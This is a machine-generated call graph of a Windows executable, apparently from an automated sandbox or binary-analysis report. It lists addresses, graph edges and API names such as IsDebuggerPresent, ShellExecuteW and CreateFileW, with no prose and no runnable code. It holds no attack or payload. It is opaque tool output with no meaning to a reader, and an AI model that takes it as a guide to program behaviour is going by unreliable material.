3a077e 97671 3a08d1 97670->97671 97674 3a07a8 97670->97674 97735 3a0baf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97671->97735 97673 3a08d8 97736 3a51c2 28 API calls _abort 97673->97736 97686 3a07e7 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97674->97686 97708 3b27ed 97674->97708 97676 3a08de 97737 3a5174 28 API calls _abort 97676->97737 97680 3a08e6 97681 3a07c7 97683 3a0848 97716 3a0cc9 97683->97716 97685 3a084e 97720 38331b 97685->97720 97686->97683 97731 3a518a 38 API calls 3 library calls 97686->97731 97691 3a086a 97691->97673 97692 3a086e 97691->97692 97693 3a0877 97692->97693 97733 3a5165 28 API calls _abort 97692->97733 97734 3a03b0 13 API calls 2 library calls 97693->97734 97696 3a087f 97696->97681 97698 3a022a 97697->97698 97738 3a0a08 IsProcessorFeaturePresent 97698->97738 97700 3a0236 97739 3a3004 10 API calls 3 library calls 97700->97739 97702 3a023b 97707 3a023f 97702->97707 97740 3b2687 97702->97740 97705 3a0256 97705->97670 97707->97670 97710 3b2804 97708->97710 97709 3a0dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97711 3a07c1 97709->97711 97710->97709 97711->97681 97712 3b2791 97711->97712 97713 3b27c0 97712->97713 97714 3a0dfc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 97713->97714 97715 3b27e9 97714->97715 97715->97686 97808 3a26b0 97716->97808 97719 3a0cef 97719->97685 97721 383382 97720->97721 97722 383327 IsThemeActive 97720->97722 97732 3a0d02 GetModuleHandleW 97721->97732 97810 3a52b3 97722->97810 97724 383352 97816 3a5319 97724->97816 97726 383359 97823 3832e6 SystemParametersInfoW SystemParametersInfoW 97726->97823 97728 383360 97824 38338b 97728->97824 97730 383368 SystemParametersInfoW 97730->97721 97731->97683 97732->97691 97733->97693 97734->97696 97735->97673 97736->97676 97737->97680 97738->97700 97739->97702 97744 3bd576 97740->97744 97743 3a302d 8 API calls 3 library calls 97743->97707 97745 3bd593 97744->97745 97748 3bd58f 97744->97748 97745->97748 97750 3b4f6e 97745->97750 97747 3a0248 97747->97705 97747->97743 97762 3a0dfc 97748->97762 97751 3b4f7a ___DestructExceptionObject 97750->97751 97769 3b32d1 EnterCriticalSection 97751->97769 97753 3b4f81 97770 3b5422 97753->97770 97755 3b4f90 97761 3b4f9f 97755->97761 97783 3b4e02 29 API calls 97755->97783 97758 3b4f9a 97784 3b4eb8 GetStdHandle GetFileType 97758->97784 97760 3b4fb0 __fread_nolock 97760->97745 97785 3b4fbb LeaveCriticalSection _abort 97761->97785 97763 3a0e07 IsProcessorFeaturePresent 97762->97763 97764 3a0e05 97762->97764 97766 3a0fce 97763->97766 97764->97747 97807 3a0f91 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97766->97807 97768 3a10b1 97768->97747 97769->97753 97771 3b542e ___DestructExceptionObject 97770->97771 97772 3b543b 97771->97772 97773 3b5452 97771->97773 97794 3af649 20 API calls _abort 97772->97794 97786 3b32d1 EnterCriticalSection 97773->97786 97776 3b5440 97795 3b2b5c 26 API calls _strftime 97776->97795 97778 3b548a 97796 3b54b1 LeaveCriticalSection _abort 97778->97796 97779 3b544a __fread_nolock 97779->97755 97780 3b545e 97780->97778 97787 3b5373 97780->97787 97783->97758 97784->97761 97785->97760 97786->97780 97797 3b4ff0 97787->97797 97789 3b5392 97790 3b2d38 _free 20 API calls 97789->97790 97793 3b53e4 97790->97793 97791 3b5385 97791->97789 97804 3b3778 11 API calls 2 library calls 97791->97804 97793->97780 97794->97776 97795->97779 97796->97779 97802 3b4ffd _abort 97797->97802 97798 3b503d 97806 3af649 20 API calls _abort 97798->97806 97799 3b5028 RtlAllocateHeap 97800 3b503b 97799->97800 97799->97802 97800->97791 97802->97798 97802->97799 97805 3a521d 7 API calls 2 library calls 97802->97805 97804->97791 97805->97802 97806->97800 97807->97768 97809 3a0cdc GetStartupInfoW 97808->97809 97809->97719 97811 3a52bf ___DestructExceptionObject 97810->97811 97873 3b32d1 EnterCriticalSection 97811->97873 97813 3a52ca pre_c_initialization 97874 3a530a 97813->97874 97815 3a52ff __fread_nolock 97815->97724 97817 3a533f 97816->97817 97818 3a5325 97816->97818 97817->97726 97818->97817 97878 3af649 20 API calls _abort 97818->97878 97820 3a532f 97879 3b2b5c 26 API calls _strftime 97820->97879 97822 3a533a 97822->97726 97823->97728 97825 38339b __wsopen_s 97824->97825 97826 38bf73 8 API calls 97825->97826 97827 3833a7 GetCurrentDirectoryW 97826->97827 97880 384fd9 97827->97880 97829 3833ce IsDebuggerPresent 97830 3833dc 97829->97830 97831 3c3ca3 MessageBoxA 97829->97831 97832 3c3cbb 97830->97832 97833 3833f0 97830->97833 97831->97832 97984 384176 8 API calls 97832->97984 97948 383a95 97833->97948 97840 383462 97842 3c3cec SetCurrentDirectoryW 97840->97842 97843 38346a 97840->97843 97842->97843 97844 383475 97843->97844 97985 3e1fb0 AllocateAndInitializeSid CheckTokenMembership FreeSid 97843->97985 97980 3834d3 7 API calls 97844->97980 97848 3c3d07 97848->97844 97850 3c3d19 97848->97850 97852 385594 10 API calls 97850->97852 97851 38347f 97854 38396b 60 API calls 97851->97854 97856 383494 97851->97856 97853 3c3d22 97852->97853 97855 38b329 8 API calls 97853->97855 97854->97856 97857 3c3d30 97855->97857 97858 3834af 97856->97858 97861 383907 Shell_NotifyIconW 97856->97861 97859 3c3d5f 97857->97859 97860 3c3d38 97857->97860 97864 3834b6 SetCurrentDirectoryW 97858->97864 97863 386b7c 8 API calls 97859->97863 97862 386b7c 8 API calls 97860->97862 97861->97858 97865 3c3d43 97862->97865 97866 3c3d5b GetForegroundWindow ShellExecuteW 97863->97866 97867 3834ca 97864->97867 97868 387bb5 8 API calls 97865->97868 97870 3c3d90 97866->97870 97867->97730 97871 3c3d51 97868->97871 97870->97858 97872 386b7c 8 API calls 97871->97872 97872->97866 97873->97813 97877 3b3319 LeaveCriticalSection 97874->97877 97876 3a5311 97876->97815 97877->97876 97878->97820 97879->97822 97881 38bf73 8 API calls 97880->97881 97882 384fef 97881->97882 97986 3863d7 97882->97986 97884 38500d 97885 38bd57 8 API calls 97884->97885 97886 385021 97885->97886 97887 38bed9 8 API calls 97886->97887 97888 38502c 97887->97888 98000 38893c 97888->98000 97891 38b329 8 API calls 97892 385045 97891->97892 97893 38be2d 39 API calls 97892->97893 97894 385055 97893->97894 97895 38b329 8 API calls 97894->97895 97896 38507b 97895->97896 97897 38be2d 39 API calls 97896->97897 97898 38508a 97897->97898 97899 38bf73 8 API calls 97898->97899 97900 3850a8 97899->97900 98003 3851ca 97900->98003 97903 3a4d98 40 API calls 97904 3850c2 97903->97904 97905 3850cc 97904->97905 97906 3c4b23 97904->97906 97908 3a4d98 40 API calls 97905->97908 97907 3851ca 8 API calls 97906->97907 97909 3c4b37 97907->97909 97910 3850d7 97908->97910 97912 3851ca 8 API calls 97909->97912 97910->97909 97911 3850e1 97910->97911 97913 3a4d98 40 API calls 97911->97913 97914 3c4b53 97912->97914 97915 3850ec 97913->97915 97918 385594 10 API calls 97914->97918 97915->97914 97916 3850f6 97915->97916 97917 3a4d98 40 API calls 97916->97917 97919 385101 97917->97919 97920 3c4b76 97918->97920 97921 38510b 97919->97921 97922 3c4b9f 97919->97922 97923 3851ca 8 API calls 97920->97923 97924 38512e 97921->97924 97927 38bed9 8 API calls 97921->97927 97925 3851ca 8 API calls 97922->97925 97926 3c4b82 97923->97926 97929 3c4bda 97924->97929 97933 387e12 8 API calls 97924->97933 97928 3c4bbd 97925->97928 97930 38bed9 8 API calls 97926->97930 97931 385121 97927->97931 97932 38bed9 8 API calls 97928->97932 97934 3c4b90 97930->97934 97936 3851ca 8 API calls 97931->97936 97937 3c4bcb 97932->97937 97938 38513e 97933->97938 97935 3851ca 8 API calls 97934->97935 97935->97922 97936->97924 97939 3851ca 8 API calls 97937->97939 97940 388470 8 API calls 97938->97940 97939->97929 97941 38514c 97940->97941 98009 388a60 97941->98009 97943 38893c 8 API calls 97945 385167 97943->97945 97944 388a60 8 API calls 97944->97945 97945->97943 97945->97944 97946 3851ab 97945->97946 97947 3851ca 8 API calls 97945->97947 97946->97829 97947->97945 97949 383aa2 __wsopen_s 97948->97949 97950 383abb 97949->97950 97951 3c40da ___scrt_fastfail 97949->97951 97952 385851 9 API calls 97950->97952 97954 3c40f6 GetOpenFileNameW 97951->97954 97953 383ac4 97952->97953 98022 383a57 97953->98022 97956 3c4145 97954->97956 97957 388577 8 API calls 97956->97957 97959 3c415a 97957->97959 97959->97959 97961 383ad9 98040 3862d5 97961->98040 98585 383624 7 API calls 97980->98585 97982 38347a 97983 3835b3 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97982->97983 97983->97851 97984->97840 97985->97848 97987 3863e4 __wsopen_s 97986->97987 97988 388577 8 API calls 97987->97988 97989 386416 97987->97989 97988->97989 97990 38655e 8 API calls 97989->97990 97998 38644c 97989->97998 97990->97989 97991 38655e 8 API calls 97991->97998 97992 38b329 8 API calls 97993 386543 97992->97993 97995 386a7c 8 API calls 97993->97995 97994 38b329 8 API calls 97994->97998 97996 38654f 97995->97996 97996->97884 97997 386a7c 8 API calls 97997->97998 97998->97991 97998->97994 97998->97997 97999 38651a 97998->97999 97999->97992 97999->97996 98001 3a014b 8 API calls 98000->98001 98002 385038 98001->98002 98002->97891 98004 3851f2 98003->98004 98005 3851d4 98003->98005 98006 388577 8 API calls 98004->98006 98007 38bed9 8 API calls 98005->98007 98008 3850b4 98005->98008 98006->98008 98007->98008 98008->97903 98010 388a76 98009->98010 98011 388a80 98010->98011 98012 3c6737 98010->98012 98013 3c6744 98011->98013 98016 388b9b 98011->98016 98018 388b94 98011->98018 98020 39b7a2 8 API calls 98012->98020 98021 38b4c8 8 API calls 98013->98021 98016->97945 98017 3c6762 98017->98017 98019 3a014b 8 API calls 98018->98019 98019->98016 98020->98013 98021->98017 98023 3c22d0 __wsopen_s 98022->98023 98024 383a64 GetLongPathNameW 98023->98024 98025 388577 8 API calls 98024->98025 98026 383a8c 98025->98026 98027 3853f2 98026->98027 98028 38bf73 8 API calls 98027->98028 98029 385404 98028->98029 98030 385851 9 API calls 98029->98030 98031 38540f 98030->98031 98032 38541a 98031->98032 98033 3c4d5b 98031->98033 98034 386a7c 8 API calls 98032->98034 98038 3c4d7d 98033->98038 98076 39e36b 41 API calls 98033->98076 98036 385426 98034->98036 98070 381340 98036->98070 98039 385439 98039->97961 98077 386679 98040->98077 98043 3c5336 98202 3f36b8 98043->98202 98044 386679 93 API calls 98047 38630e 98044->98047 98046 3c5347 98048 3c5368 98046->98048 98049 3c534b 98046->98049 98047->98043 98050 386316 98047->98050 98052 3a017b 8 API calls 98048->98052 98247 3866e7 98049->98247 98053 386322 98050->98053 98054 3c5353 98050->98054 98059 3c53ad 98052->98059 98099 383b39 98053->98099 98253 3ee30e 82 API calls 98054->98253 98057 3c5361 98057->98048 98060 3c555e 98059->98060 98062 3c5566 98059->98062 98067 38b329 8 API calls 98059->98067 98224 3e9ff8 98059->98224 98227 3f1519 98059->98227 98233 38bba9 98059->98233 98241 385d21 98059->98241 98254 3e9f27 41 API calls _wcslen 98059->98254 98060->98062 98061 3866e7 68 API calls 98061->98062 98062->98061 98255 3ea215 81 API calls __wsopen_s 98062->98255 98067->98059 98071 381352 98070->98071 98075 381371 __fread_nolock 98070->98075 98073 3a017b 8 API calls 98071->98073 98072 3a014b 8 API calls 98074 381388 98072->98074 98073->98075 98074->98039 98075->98072 98076->98033 98256 38663e LoadLibraryA 98077->98256 98082 3c5648 98085 3866e7 68 API calls 98082->98085 98083 3866a4 LoadLibraryExW 98264 386607 LoadLibraryA 98083->98264 98087 3c564f 98085->98087 98089 386607 3 API calls 98087->98089 98091 3c5657 98089->98091 98090 3866ce 98090->98091 98092 3866da 98090->98092 98285 38684a 98091->98285 98094 3866e7 68 API calls 98092->98094 98096 3862fa 98094->98096 98096->98043 98096->98044 98098 3c567e 98100 3c415f 98099->98100 98101 383b62 98099->98101 98465 3ea215 81 API calls __wsopen_s 98100->98465 98103 3a017b 8 API calls 98101->98103 98104 383b86 98103->98104 98105 387aab CloseHandle 98104->98105 98106 383b94 98105->98106 98107 38bf73 8 API calls 98106->98107 98110 383b9d 98107->98110 98108 383bfa 98111 38bf73 8 API calls 98108->98111 98109 383bec 98109->98108 98112 3c4179 98109->98112 98466 3ed5aa SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 98109->98466 98113 387aab CloseHandle 98110->98113 98114 383c06 98111->98114 98112->98108 98112->98109 98115 383ba6 98113->98115 98437 383ae9 98114->98437 98118 387aab CloseHandle 98115->98118 98119 3c41d5 98119->98108 98203 3f36d4 98202->98203 98204 386874 64 API calls 98203->98204 98205 3f36e8 98204->98205 98483 3f3827 98205->98483 98208 3f3700 98208->98046 98209 38684a 40 API calls 98210 3f3717 98209->98210 98211 38684a 40 API calls 98210->98211 98212 3f3727 98211->98212 98213 38684a 40 API calls 98212->98213 98214 3f3742 98213->98214 98225 3a017b 8 API calls 98224->98225 98226 3ea028 __fread_nolock 98225->98226 98226->98059 98228 3f1524 98227->98228 98229 3a014b 8 API calls 98228->98229 98230 3f153b 98229->98230 98231 38b329 8 API calls 98230->98231 98234 38bc33 98233->98234 98239 38bbb9 __fread_nolock 98233->98239 98236 3a017b 8 API calls 98234->98236 98235 3a014b 8 API calls 98237 38bbc0 98235->98237 98236->98239 98238 3a014b 8 API calls 98237->98238 98240 38bbde 98237->98240 98238->98240 98239->98235 98240->98059 98242 385d34 98241->98242 98244 385dd8 98241->98244 98243 3a017b 8 API calls 98242->98243 98245 385d66 98242->98245 98243->98245 98244->98059 98245->98244 98246 3a014b 8 API calls 98245->98246 98246->98245 98248 3866f8 98247->98248 98249 3866f1 98247->98249 98251 38670f 98248->98251 98252 3c56a4 FreeLibrary 98248->98252 98490 3ae9e8 98249->98490 98251->98054 98253->98057 98254->98059 98255->98062 98257 386674 98256->98257 98258 386656 GetProcAddress 98256->98258 98261 3ae95b 98257->98261 98259 386666 98258->98259 98259->98257 98260 38666d FreeLibrary 98259->98260 98260->98257 98293 3ae89a 98261->98293 98263 386698 98263->98082 98263->98083 98265 38663b 98264->98265 98266 38661c GetProcAddress 98264->98266 98269 386720 98265->98269 98267 38662c 98266->98267 98267->98265 98268 386634 FreeLibrary 98267->98268 98268->98265 98270 3a017b 8 API calls 98269->98270 98271 386735 98270->98271 98272 38423c 8 API calls 98271->98272 98273 386741 __fread_nolock 98272->98273 98274 3c56c2 98273->98274 98278 38677c 98273->98278 98350 3f3a0e CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 98273->98350 98351 3f3a92 74 API calls 98274->98351 98277 38684a 40 API calls 98277->98278 98278->98277 98279 386874 64 API calls 98278->98279 98281 386810 messages 98278->98281 98282 3c5706 98278->98282 98279->98278 98281->98090 98345 386874 98282->98345 98284 38684a 40 API calls 98284->98281 98286 38685c 98285->98286 98287 3c5760 98285->98287 98383 3aec34 98286->98383 98290 3f32bd 98420 3f310d 98290->98420 98292 3f32d8 98292->98098 98295 3ae8a6 ___DestructExceptionObject 98293->98295 98294 3ae8b4 98318 3af649 20 API calls _abort 98294->98318 98295->98294 98297 3ae8e4 98295->98297 98299 3ae8e9 98297->98299 98300 3ae8f6 98297->98300 98298 3ae8b9 98319 3b2b5c 26 API calls _strftime 98298->98319 98320 3af649 20 API calls _abort 98299->98320 98310 3b83e1 98300->98310 98304 3ae8c4 __fread_nolock 98304->98263 98305 3ae8ff 98306 3ae912 98305->98306 98307 3ae905 98305->98307 98322 3ae944 LeaveCriticalSection __fread_nolock 98306->98322 98321 3af649 20 API calls _abort 98307->98321 98311 3b83ed ___DestructExceptionObject 98310->98311 98323 3b32d1 EnterCriticalSection 98311->98323 98313 3b83fb 98324 3b847b 98313->98324 98317 3b842c __fread_nolock 98317->98305 98318->98298 98319->98304 98320->98304 98321->98304 98322->98304 98323->98313 98330 3b849e 98324->98330 98325 3b84f7 98326 3b4ff0 _abort 20 API calls 98325->98326 98327 3b8500 98326->98327 98329 3b2d38 _free 20 API calls 98327->98329 98331 3b8509 98329->98331 98330->98325 98330->98330 98333 3b8408 98330->98333 98340 3a94fd EnterCriticalSection 98330->98340 98341 3a9511 LeaveCriticalSection 98330->98341 98331->98333 98342 3b3778 11 API calls 2 library calls 98331->98342 98337 3b8437 98333->98337 98334 3b8528 98343 3a94fd EnterCriticalSection 98334->98343 98344 3b3319 LeaveCriticalSection 98337->98344 98339 3b843e 98339->98317 98340->98330 98341->98330 98342->98334 98343->98333 98344->98339 98346 386883 98345->98346 98347 3c5780 98345->98347 98352 3af053 98346->98352 98350->98274 98351->98278 98355 3aee1a 98352->98355 98354 386891 98354->98284 98359 3aee26 ___DestructExceptionObject 98355->98359 98356 3aee32 98380 3af649 20 API calls _abort 98356->98380 98358 3aee58 98368 3a94fd EnterCriticalSection 98358->98368 98359->98356 98359->98358 98360 3aee37 98381 3b2b5c 26 API calls _strftime 98360->98381 98363 3aee64 98369 3aef7a 98363->98369 98365 3aee78 98382 3aee97 LeaveCriticalSection __fread_nolock 98365->98382 98367 3aee42 __fread_nolock 98367->98354 98368->98363 98370 3aef9c 98369->98370 98371 3aef8c 98369->98371 98373 3aeea1 28 API calls 98370->98373 98372 3af649 __dosmaperr 20 API calls 98371->98372 98374 3aef91 98372->98374 98376 3aefbf 98373->98376 98374->98365 98375 3adf7b 62 API calls 98377 3aefe6 98375->98377 98376->98375 98379 3af03e 98376->98379 98378 3b97a4 __wsopen_s 28 API calls 98377->98378 98378->98379 98379->98365 98380->98360 98381->98367 98382->98367 98386 3aec51 98383->98386 98385 38686d 98385->98290 98387 3aec5d ___DestructExceptionObject 98386->98387 98388 3aec9d 98387->98388 98389 3aec70 ___scrt_fastfail 98387->98389 98398 3aec95 __fread_nolock 98387->98398 98399 3a94fd EnterCriticalSection 98388->98399 98413 3af649 20 API calls _abort 98389->98413 98392 3aeca7 98400 3aea68 98392->98400 98393 3aec8a 98414 3b2b5c 26 API calls _strftime 98393->98414 98398->98385 98399->98392 98401 3aea97 98400->98401 98405 3aea7a ___scrt_fastfail 98400->98405 98415 3aecdc LeaveCriticalSection __fread_nolock 98401->98415 98402 3aea87 98416 3af649 20 API calls _abort 98402->98416 98404 3aeada __fread_nolock 98404->98401 98407 3aebf6 ___scrt_fastfail 98404->98407 98410 3adcc5 __fread_nolock 26 API calls 98404->98410 98412 3b90c5 __fread_nolock 38 API calls 98404->98412 98418 3ad2e8 26 API calls 4 library calls 98404->98418 98405->98401 98405->98402 98405->98404 98419 3af649 20 API calls _abort 98407->98419 98410->98404 98411 3aea8c 98417 3b2b5c 26 API calls _strftime 98411->98417 98412->98404 98413->98393 98414->98398 98415->98398 98416->98411 98417->98401 98418->98404 98419->98411 98423 3ae858 98420->98423 98422 3f311c 98422->98292 98426 3ae7d9 98423->98426 98425 3ae875 98425->98422 98427 3ae7e8 98426->98427 98428 3ae7fc 98426->98428 98434 3af649 20 API calls _abort 98427->98434 98433 3ae7f8 __alldvrm 98428->98433 98436 3b36b2 11 API calls 2 library calls 98428->98436 98430 3ae7ed 98435 3b2b5c 26 API calls _strftime 98430->98435 98433->98425 98434->98430 98435->98433 98436->98433 98438 3c22d0 __wsopen_s 98437->98438 98439 383af6 GetCurrentDirectoryW 98438->98439 98440 388577 8 API calls 98439->98440 98465->98109 98466->98119 98484 3f383b 98483->98484 98485 38684a 40 API calls 98484->98485 98486 3f32bd 27 API calls 98484->98486 98487 3f36fc 98484->98487 98488 386874 64 API calls 98484->98488 98485->98484 98486->98484 98487->98208 98487->98209 98488->98484 98585->97982 98586 3af06e 98587 3af07a ___DestructExceptionObject 98586->98587 98588 3af09b 98587->98588 98589 3af086 98587->98589 98599 3a94fd EnterCriticalSection 98588->98599 98605 3af649 20 API calls _abort 98589->98605 98592 3af0a7 98600 3af0db 98592->98600 98593 3af08b 98606 3b2b5c 26 API calls _strftime 98593->98606 98598 3af096 __fread_nolock 98599->98592 98608 3af106 98600->98608 98602 3af0e8 98604 3af0b4 98602->98604 98628 3af649 20 API calls _abort 98602->98628 98607 3af0d1 LeaveCriticalSection __fread_nolock 98604->98607 98605->98593 98606->98598 98607->98598 98609 3af12e 98608->98609 98610 3af114 98608->98610 98612 3adcc5 __fread_nolock 26 API calls 98609->98612 98632 3af649 20 API calls _abort 98610->98632 98614 3af137 98612->98614 98613 3af119 98633 3b2b5c 26 API calls _strftime 98613->98633 98629 3b9789 98614->98629 98618 3af23b 98620 3af248 98618->98620 98624 3af1ee 98618->98624 98619 3af1bf 98622 3af1dc 98619->98622 98619->98624 98635 3af649 20 API calls _abort 98620->98635 98634 3af41f 31 API calls 4 library calls 98622->98634 98625 3af124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 98624->98625 98636 3af29b 30 API calls 2 library calls 98624->98636 98625->98602 98626 3af1e6 98626->98625 98628->98604 98637 3b9606 98629->98637 98631 3af153 98631->98618 98631->98619 98631->98625 98632->98613 98633->98625 98634->98626 98635->98625 98636->98625 98638 3b9612 ___DestructExceptionObject 98637->98638 98639 3b961a 98638->98639 98640 3b9632 98638->98640 98663 3af636 20 API calls _abort 98639->98663 98642 3b96e6 98640->98642 98646 3b966a 98640->98646 98668 3af636 20 API calls _abort 98642->98668 98643 3b961f 98664 3af649 20 API calls _abort 98643->98664 98662 3b54ba EnterCriticalSection 98646->98662 98647 3b96eb 98669 3af649 20 API calls _abort 98647->98669 98648 3b9627 __fread_nolock 98648->98631 98651 3b9670 98653 3b96a9 98651->98653 98654 3b9694 98651->98654 98652 3b96f3 98670 3b2b5c 26 API calls _strftime 98652->98670 98656 3b970b __wsopen_s 28 API calls 98653->98656 98665 3af649 20 API calls _abort 98654->98665 98659 3b96a4 98656->98659 98658 3b9699 98666 3af636 20 API calls _abort 98658->98666 98667 3b96de LeaveCriticalSection __wsopen_s 98659->98667 98662->98651 98663->98643 98664->98648 98665->98658 98666->98659 98667->98648 98668->98647 98669->98652 98670->98648 98671 3d17c8 98672 3d17df 98671->98672 98674 38d2a0 98672->98674 98675 3f3fe1 81 API calls __wsopen_s 98672->98675 98675->98674 98676 3d3c0a 98697 3ec819 98676->98697 98678 3d3c14 98680 3d3c3f 98678->98680 98681 3ec819 Sleep 98678->98681 98686 38efdb 98678->98686 98703 39aa65 9 API calls 98678->98703 98682 38b329 8 API calls 98680->98682 98681->98678 98683 3d3c6f 98682->98683 98704 38bfa5 39 API calls 98683->98704 98685 3d3c8b 98705 3f446f 8 API calls 98685->98705 98690 38f450 98686->98690 98689 38f097 98691 38f46f 98690->98691 98692 38f483 98690->98692 98706 38e960 98691->98706 98738 3f3fe1 81 API calls __wsopen_s 98692->98738 98695 38f47a 98695->98689 98696 3d4584 98696->98696 98699 3ec83f 98697->98699 98700 3ec824 98697->98700 98698 3ec86d 98698->98678 98699->98698 98701 3ec851 Sleep 98699->98701 98700->98678 98701->98698 98703->98678 98704->98685 98705->98689 98707 390340 207 API calls 98706->98707 98727 38e99d 98707->98727 98708 3d31d3 98752 3f3fe1 81 API calls __wsopen_s 98708->98752 98710 38ea0b messages 98710->98695 98711 38eac3 98713 38edd5 98711->98713 98714 38eace 98711->98714 98712 38ecff 98716 3d31c4 98712->98716 98717 38ed14 98712->98717 98713->98710 98721 3a017b 8 API calls 98713->98721 98715 3a014b 8 API calls 98714->98715 98724 38ead5 __fread_nolock 98715->98724 98751 406162 8 API calls 98716->98751 98720 3a014b 8 API calls 98717->98720 98718 38ebb8 98722 3a017b 8 API calls 98718->98722 98730 38eb6a 98720->98730 98721->98724 98733 38eb29 __fread_nolock messages 98722->98733 98723 3a014b 8 API calls 98726 38eaf6 98723->98726 98724->98723 98724->98726 98725 3a014b 8 API calls 98725->98727 98726->98733 98739 38d260 98726->98739 98727->98708 98727->98710 98727->98711 98727->98713 98727->98718 98727->98725 98727->98733 98729 3d31b3 98750 3f3fe1 81 API calls __wsopen_s 98729->98750 98730->98695 98733->98712 98733->98729 98733->98730 98734 3d318e 98733->98734 98736 3d316c 98733->98736 98747 3844fe 207 API calls 98733->98747 98749 3f3fe1 81 API calls __wsopen_s 98734->98749 98748 3f3fe1 81 API calls __wsopen_s 98736->98748 98738->98696 98740 38d29a 98739->98740 98741 38d2c6 98739->98741 98753 38f6d0 98740->98753 98743 390340 207 API calls 98741->98743 98744 3d184b 98743->98744 98746 38d2a0 98744->98746 98776 3f3fe1 81 API calls __wsopen_s 98744->98776 98746->98733 98747->98733 98748->98730 98749->98730 98750->98730 98751->98708 98752->98710 98754 38f710 98753->98754 98770 38f7dc messages 98754->98770 98778 3a05b2 5 API calls __Init_thread_wait 98754->98778 98755 390340 207 API calls 98755->98770 98758 3d45d9 98760 38bf73 8 API calls 98758->98760 98758->98770 98759 38bf73 8 API calls 98759->98770 98762 3d45f3 98760->98762 98779 3a0413 29 API calls __onexit 98762->98779 98763 38be2d 39 API calls 98763->98770 98766 3d45fd 98780 3a0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98766->98780 98768 3f3fe1 81 API calls 98768->98770 98770->98755 98770->98759 98770->98763 98770->98768 98771 38bed9 8 API calls 98770->98771 98772 38fae1 98770->98772 98773 391ca0 8 API calls 98770->98773 98777 39b35c 207 API calls 98770->98777 98781 3a05b2 5 API calls __Init_thread_wait 98770->98781 98782 3a0413 29 API calls __onexit 98770->98782 98783 3a0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98770->98783 98784 405231 101 API calls 98770->98784 98785 40731e 207 API calls 98770->98785 98771->98770 98772->98746 98773->98770 98776->98746 98777->98770 98778->98758 98779->98766 98780->98770 98781->98770 98782->98770 98783->98770 98784->98770 98785->98770 98786 38f4c0 98789 39a025 98786->98789 98788 38f4cc 98790 39a046 98789->98790 98795 39a0a3 98789->98795 98792 390340 207 API calls 98790->98792 98790->98795 98796 39a077 98792->98796 98793 3d806b 98793->98793 98794 39a0e7 98794->98788 98795->98794 98798 3f3fe1 81 API calls __wsopen_s 98795->98798 98796->98794 98796->98795 98797 38bed9 8 API calls 98796->98797 98797->98795 98798->98793 98799 3b8782 98804 3b853e 98799->98804 98802 3b87aa 98809 3b856f try_get_first_available_module 98804->98809 98806 3b876e 98823 3b2b5c 26 API calls _strftime 98806->98823 98808 3b86c3 98808->98802 98816 3c0d04 98808->98816 98809->98809 98812 3b86b8 98809->98812 98819 3a917b 40 API calls 2 library calls 98809->98819 98811 3b870c 98811->98812 98820 3a917b 40 API calls 2 library calls 98811->98820 98812->98808 98822 3af649 20 API calls _abort 98812->98822 98814 3b872b 98814->98812 98821 3a917b 40 API calls 2 library calls 98814->98821 98824 3c0401 98816->98824 98818 3c0d1f 98818->98802 98819->98811 98820->98814 98821->98812 98822->98806 98823->98808 98827 3c040d ___DestructExceptionObject 98824->98827 98825 3c041b 98882 3af649 20 API calls _abort 98825->98882 98827->98825 98829 3c0454 98827->98829 98828 3c0420 98883 3b2b5c 26 API calls _strftime 98828->98883 98835 3c09db 98829->98835 98834 3c042a __fread_nolock 98834->98818 98885 3c07af 98835->98885 98838 3c0a0d 98917 3af636 20 API calls _abort 98838->98917 98839 3c0a26 98903 3b5594 98839->98903 98842 3c0a12 98918 3af649 20 API calls _abort 98842->98918 98843 3c0a2b 98844 3c0a4b 98843->98844 98845 3c0a34 98843->98845 98916 3c071a CreateFileW 98844->98916 98919 3af636 20 API calls _abort 98845->98919 98849 3c0a39 98920 3af649 20 API calls _abort 98849->98920 98850 3c0b01 GetFileType 98853 3c0b0c GetLastError 98850->98853 98854 3c0b53 98850->98854 98852 3c0ad6 GetLastError 98922 3af613 20 API calls __dosmaperr 98852->98922 98923 3af613 20 API calls __dosmaperr 98853->98923 98925 3b54dd 21 API calls 2 library calls 98854->98925 98855 3c0a84 98855->98850 98855->98852 98921 3c071a CreateFileW 98855->98921 98859 3c0b1a CloseHandle 98859->98842 98862 3c0b43 98859->98862 98861 3c0ac9 98861->98850 98861->98852 98924 3af649 20 API calls _abort 98862->98924 98863 3c0b74 98868 3c0bc0 98863->98868 98926 3c092b 72 API calls 3 library calls 98863->98926 98865 3c0b48 98865->98842 98870 3c0bed 98868->98870 98927 3c04cd 72 API calls 3 library calls 98868->98927 98869 3c0be6 98869->98870 98871 3c0bfe 98869->98871 98928 3b8a2e 98870->98928 98873 3c0478 98871->98873 98874 3c0c7c CloseHandle 98871->98874 98884 3c04a1 LeaveCriticalSection __wsopen_s 98873->98884 98943 3c071a CreateFileW 98874->98943 98876 3c0ca7 98877 3c0cb1 GetLastError 98876->98877 98878 3c0cdd 98876->98878 98944 3af613 20 API calls __dosmaperr 98877->98944 98878->98873 98880 3c0cbd 98945 3b56a6 21 API calls 2 library calls 98880->98945 98882->98828 98883->98834 98884->98834 98886 3c07ea 98885->98886 98887 3c07d0 98885->98887 98946 3c073f 98886->98946 98887->98886 98953 3af649 20 API calls _abort 98887->98953 98890 3c07df 98954 3b2b5c 26 API calls _strftime 98890->98954 98892 3c0822 98893 3c0851 98892->98893 98955 3af649 20 API calls _abort 98892->98955 98896 3c08a4 98893->98896 98957 3ada7d 26 API calls 2 library calls 98893->98957 98896->98838 98896->98839 98897 3c089f 98897->98896 98899 3c091e 98897->98899 98898 3c0846 98956 3b2b5c 26 API calls _strftime 98898->98956 98958 3b2b6c 11 API calls _abort 98899->98958 98902 3c092a 98904 3b55a0 ___DestructExceptionObject 98903->98904 98961 3b32d1 EnterCriticalSection 98904->98961 98906 3b55ee 98962 3b569d 98906->98962 98907 3b55a7 98907->98906 98908 3b55cc 98907->98908 